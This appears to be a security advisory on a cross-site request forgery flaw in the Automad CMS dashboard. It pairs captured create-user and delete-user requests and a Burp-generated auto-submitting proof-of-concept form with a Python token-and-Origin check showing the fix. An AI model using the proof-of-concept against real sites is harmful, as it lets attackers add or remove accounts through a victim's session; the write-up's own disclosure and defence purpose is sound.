Testing showed that the application does not implement anti-CSRF tokens by default: state-changing dashboard requests are authorised by the session cookie alone, which the browser attaches automatically, so a page on another origin can submit them on behalf of a logged-in user. Dashboard actions such as creating and deleting users are affected. Below is the request captured while adding a user:
POST /dashboard?controller=UserCollection::createUser HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 76
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd

CSRF HTML:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
<input type="hidden" name="username" value="User" />
<input type="hidden" name="email" value="User@example.com" />
<input type="hidden" name="password1" value="Passw0rd" />
<input type="hidden" name="password2" value="Passw0rd" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>

Delete Users:
POST /dashboard?controller=UserCollection::edit HTTP/1.1
Host: automad.scr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: http://automad.scr
Connection: close
Referer: http://automad.scr/dashboard?view=System
Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
X-PwnFox-Color: green

delete%5B%5D=User
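Both captured requests carry nothing that ties the submission to the session except the cookie itself, which is exactly what the PoC form above relies on. The following Python is an added example, not Automad's code, of the check these endpoints are missing: a per-session synchronizer token compared in constant time, with an Origin/Referer check as a second layer. It parses requests shaped like the createUser capture above and shows the captured body being rejected while the same body with a valid token is accepted; the same check applies to the UserCollection::edit delete request. The field name __csrf, the in-memory session store and the attacker origin are assumptions for illustration.

```python
# Added example (not Automad's code): the synchronizer-token and Origin
# check that the dashboard endpoints above are missing.  TOKEN_FIELD, the
# session store and the attacker origin are assumptions for illustration.
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

ALLOWED_ORIGIN = "http://automad.scr"   # the site's own origin (from the capture)
TOKEN_FIELD = "__csrf"                  # hypothetical hidden form field name
SESSIONS = {}                           # constructed store: session id -> token


def issue_token(session_id):
    """Mint a per-session token; the server embeds it in every dashboard form."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    return token


def parse_request(raw):
    """Split a raw HTTP/1.1 request, as captured in a proxy, into its parts."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def session_id_from(headers):
    """Pull the value of the Automad-<hash> session cookie, if present."""
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name.startswith("Automad-"):
            return value
    return None


def csrf_check(req):
    """Return (accepted, reason) for a parsed request.

    State-changing methods are rejected when the request comes from a
    foreign origin, carries no token, or carries a token that does not
    match the one issued to the session named in the cookie."""
    if req["method"] not in ("POST", "PUT", "PATCH", "DELETE"):
        return True, "safe method"
    headers = req["headers"]
    # Browsers send Origin on cross-origin form POSTs, so the Burp PoC above
    # would arrive with the attacker's origin here; Referer is the fallback.
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "no Origin/Referer header"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != ALLOWED_ORIGIN:
        return False, f"cross-site source {source}"
    expected = SESSIONS.get(session_id_from(headers))
    submitted = parse_qs(req["body"]).get(TOKEN_FIELD, [""])[0]
    if not expected or not submitted:
        return False, "missing CSRF token"
    # Constant-time compare: a plain == would leak the token byte by byte.
    if not hmac.compare_digest(expected, submitted):
        return False, "CSRF token mismatch"
    return True, "token ok"


# Constructed request with the same shape and body as the createUser capture.
SESSION_ID = "feu6beoo6sc7ha2gp2gilsk211"
CAPTURED = (
    "POST /dashboard?controller=UserCollection::createUser HTTP/1.1\r\n"
    "Host: automad.scr\r\n"
    "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "Origin: http://automad.scr\r\n"
    f"Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef={SESSION_ID}\r\n"
    "\r\n"
    "username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd"
)


def from_attacker_page(raw, origin="http://attacker.example"):
    """The same request as a browser sends it when the PoC form is hosted elsewhere."""
    return raw.replace("Origin: http://automad.scr", f"Origin: {origin}")


def with_token(raw, token):
    """Append the hidden token field, as a legitimately served form would."""
    return raw + f"&{TOKEN_FIELD}={token}"


def demo():
    """Run the guard over the captured body in four situations."""
    token = issue_token(SESSION_ID)
    return {
        "captured_no_token": csrf_check(parse_request(CAPTURED)),
        "cross_site_no_token": csrf_check(parse_request(from_attacker_page(CAPTURED))),
        "same_site_wrong_token": csrf_check(parse_request(with_token(CAPTURED, "guess"))),
        "same_site_valid_token": csrf_check(parse_request(with_token(CAPTURED, token))),
    }


if __name__ == "__main__":
    for case, (ok, why) in demo().items():
        print(f"{case:24} {'accept' if ok else 'reject'}: {why}")
```

Two checks are worth making when confirming the finding. First, replay the request without the X-Requested-With: XMLHttpRequest header and with a foreign Origin: a cross-origin HTML form such as the PoC above cannot set X-Requested-With, so an endpoint that required that header would not be exploitable by a plain form post. Second, look at the Set-Cookie attributes of the Automad-… session cookie: a browser does not attach a SameSite=Lax or SameSite=Strict cookie to a cross-site POST, so the cookie flags decide whether the PoC reaches the server authenticated at all.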
